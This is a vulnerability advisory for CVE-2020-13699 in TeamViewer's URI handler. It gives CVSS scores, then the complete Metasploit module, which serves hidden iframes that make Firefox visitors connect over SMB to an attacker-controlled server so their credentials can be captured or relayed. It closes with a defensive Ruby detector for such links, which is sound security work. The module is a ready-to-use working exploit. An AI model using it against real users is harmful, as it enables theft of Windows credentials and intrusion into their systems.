CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS2: 6.8 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P

EPSS: 0.192 Low
Percentile: 96.2%

This module exploits an unquoted parameter call within the TeamViewer URI handler to create an SMB connection to an attacker-controlled IP. TeamViewer < 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3 are vulnerable. Only Firefox can be exploited by this vulnerability, as all other browsers encode the space after ‘play’ and before the SMB location, preventing successful exploitation. TeamViewer 15.4.4445 and 8.0.16642 were successfully tested against.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'TeamViewer Unquoted URI Handler SMB Redirect',
        'Description' => %q{
          This module exploits an unquoted parameter call within the Teamviewer
          URI handler to create an SMB connection to an attacker controlled IP.
          TeamViewer < 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870,
          12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3 are
          vulnerable.
          Only Firefox can be exploited by this vulnerability, as all other
          browsers encode the space after 'play' and before the SMB location,
          preventing successful exploitation.
          Teamviewer 15.4.4445, and 8.0.16642 were successfully tested against.
        },
        'Author' => [
          'Jeffrey Hofmann <[email protected]>', # Vuln discovery, PoC, etc
          'h00die' # msf module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'https://jeffs.sh/CVEs/CVE-2020-13699.txt' ],
          [ 'CVE', '2020-13699' ],
          [ 'URL', 'https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448' ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )
    register_options(
      [
        OptString.new('FILE_NAME', [false, 'Arbitrary tv file location', '\\teamviewer\\config.tvs']),
        OptString.new('SMB_SERVER', [true, 'SMB server IP address', '']),
        OptEnum.new('URI_HANDLER', [
          true, 'TeamViewer URI Handler', 'teamviewer10', [
            'teamviewer10',
            'teamviewer8', 'teamviewerapi', 'tvchat1', 'tvcontrol1', 'tvfiletransfer1', 'tvjoinv8',
            'tvpresent1', 'tvsendfile1', 'tvsqcustomer1', 'tvsqsupport1', 'tvvideocall1', 'tvvpn1'
          ]
        ])
      ]
    )
  end

  def html_content
    # For some reason, tends to work best when double iframes. Single will pop up the 'open app' message, but tends to not connect.
    %(
    <html>
    <head></head>
    <body>
    <iframe style="height:1px;width:1px;" src="#{datastore['URI_HANDLER']}: --play \\\\#{datastore['SMB_SERVER']}#{datastore['FILE_NAME']}"></iframe>
    <iframe style="height:1px;width:1px;" src="#{datastore['URI_HANDLER']}: --play \\\\#{datastore['SMB_SERVER']}#{datastore['FILE_NAME']}"></iframe>
    </body>
    </html>
    )
  end

  def on_request_uri(cli, req)
    print_status("Request received for: #{req.uri}")
    ua = req.headers['User-Agent'].to_s
    # Only Firefox leaves the space before the SMB location unencoded
    unless ua.include?('Firefox')
      print_error('Target is not Firefox')
      return
    end
    print_status("Sending TeamViewer Link to #{ua}...")
    send_response_html(cli, html_content)
  end

  def run
    print_good("Please start an SMB capture/relay on #{datastore['SMB_SERVER']}")
    exploit
  end
end
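
A detection-side check for the markup pattern described above, as an added example that is not part of the Metasploit module or the advisory: it scans HTML or proxy-captured content for a TeamViewer handler URI followed by a `--` option and a UNC path, and records whether the space before the path is raw or percent-encoded. The function name, the sample markup and the 192.0.2.10 address are constructed for illustration; matching any `--option` rather than only `--play` goes slightly beyond the case on this page.

```ruby
# Added example: flag TeamViewer URI-handler links that carry an injected
# "--option \\host\path" argument.

# Handler names are the URI_HANDLER values registered by the module above.
TV_HANDLERS = %w[
  teamviewer10 teamviewer8 teamviewerapi tvchat1 tvcontrol1 tvfiletransfer1
  tvjoinv8 tvpresent1 tvsendfile1 tvsqcustomer1 tvsqsupport1 tvvideocall1 tvvpn1
].freeze

# handler ":" [gap] "--option" gap "\\host" ["\share\file"]; a gap is raw
# whitespace or "%20" (the encoded form that non-Firefox browsers emit).
TV_INJECTION = /
  \b(?<handler>#{Regexp.union(TV_HANDLERS).source}):
  (?:\s|%20)*
  (?<option>--[a-z]+)
  (?<gap>(?:\s|%20)+)
  \\\\(?<host>[^\\\s"'<>]+)
  (?<path>(?:\\[^\\\s"'<>]*)*)
/xi

# Hypothetical helper: returns one hash per suspicious handler URI in text.
def find_tv_handler_injections(text)
  hits = []
  text.scan(TV_INJECTION) do
    m = Regexp.last_match
    hits << {
      handler: m[:handler].downcase,
      option: m[:option],
      unc: "\\\\#{m[:host]}#{m[:path]}",
      # Per the description, only an unencoded space before the SMB location
      # is exploitable; an encoded one is still worth logging as an attempt.
      raw_space: !m[:gap].include?('%20')
    }
  end
  hits
end

# Constructed sample input (not captured traffic).
SAMPLE = <<~'HTML'
  <iframe src="teamviewer10: --play \\192.0.2.10\teamviewer\config.tvs"></iframe>
  <a href="tvvpn1:%20--play%20\\192.0.2.10\share\x.tvs">encoded</a>
  <a href="teamviewer10:">bare handler, no arguments</a>
HTML

if __FILE__ == $PROGRAM_NAME
  find_tv_handler_injections(SAMPLE).each { |h| puts h.inspect }
end
```

The `unc` host in each hit is the value to correlate with outbound SMB (TCP 445) connection logs from the same client.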